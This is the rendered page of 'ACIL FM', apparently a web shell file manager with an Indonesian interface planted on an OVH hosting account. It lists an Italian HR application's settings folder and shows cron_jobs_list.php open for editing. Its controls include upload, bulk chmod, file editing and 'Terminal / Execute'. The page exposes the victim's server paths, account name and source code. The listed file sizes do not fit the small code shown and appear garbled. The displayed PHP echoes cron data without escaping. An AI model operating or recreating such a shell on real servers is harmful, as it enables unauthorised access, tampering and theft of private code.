ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/app/NH-HR-test/ds/public/settings
/
home
mhhtmff
app
NH-HR-test
ds
public
settings
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
check_parameters_content.php
2.86 MB
chmod
View
DL
Edit
Rename
Delete
company_datas_content.php
952 B
chmod
View
DL
Edit
Rename
Delete
cron_jobs_list.php
1.9 MB
chmod
View
DL
Edit
Rename
Delete
cron_logs_list.php
810 B
chmod
View
DL
Edit
Rename
Delete
edit_cron_job_content.php
10.94 MB
chmod
View
DL
Edit
Rename
Delete
edit_justification_content.php
3.12 MB
chmod
View
DL
Edit
Rename
Delete
edit_payments_office_content.php
2.7 MB
chmod
View
DL
Edit
Rename
Delete
edit_stamper_content.php
2.79 MB
chmod
View
DL
Edit
Rename
Delete
justifications_content.php
1.22 MB
chmod
View
DL
Edit
Rename
Delete
new_cron_job_content.php
4.54 MB
chmod
View
DL
Edit
Rename
Delete
new_justification_content.php
2.11 MB
chmod
View
DL
Edit
Rename
Delete
new_payments_office_content.php
2.04 MB
chmod
View
DL
Edit
Rename
Delete
new_stamper_content.php
2.16 MB
chmod
View
DL
Edit
Rename
Delete
payments_office_content.php
1.3 MB
chmod
View
DL
Edit
Rename
Delete
settings_list.php
7.28 MB
chmod
View
DL
Edit
Rename
Delete
stampers_list.php
1.29 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/app/NH-HR-test/ds/public/settings/cron_jobs_list.php
<?php session_start(); if (!isset($_SESSION['loggedin'])) { exit("unauthorized"); } include "../../php/ovh.php"; include "../../php/globals.php"; ?> <table id="cron_jobs_list_table" class="display" style="width: 100%;"> <thead> <tr> <th>ID</th> <th>Comando</th> <th>Frequenza</th> <th>Stato</th> <th>Linguaggio</th> <th>Descrizione</th> <th>Email</th> <th></th> </tr> </thead> <tbody> <?php $crons_list = $ovh->get("/hosting/web/mhhtmff.cluster029.hosting.ovh.net/cron"); for ($i = 0; $i < count($crons_list); $i++) { $cron_details = $ovh->get("/hosting/web/mhhtmff.cluster029.hosting.ovh.net/cron/" . $crons_list[$i]); if (str_starts_with($cron_details["command"], $cron_command_prefix)) { echo "<tr>"; echo "<td>" . $cron_details['id'] . "</td>"; echo "<td>" . $cron_details['command'] . "</td>"; echo "<td>" . $cron_details['frequency'] . "</td>"; if ($cron_details['status'] == "enabled") { echo "<td>Abilitato</td>"; } else { echo "<td>Disabilitato</td>"; } echo "<td>" . $cron_details['language'] . "</td>"; echo "<td>" . $cron_details['description'] . "</td>"; echo "<td>" . $cron_details['email'] . "</td>"; echo "<td> <a onclick='editCronJob(" . $cron_details['id'] . ")' style='cursor: pointer; margin-right:10px'><i class='fa-solid fa-magnifying-glass'></i></a> <a onclick='deleteCronJob(" . $cron_details['id'] . ")' style='cursor: pointer'><i class='fa-solid fa-trash'></i></a> </td>"; echo "</tr>"; } } ?> </tbody> </table>
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply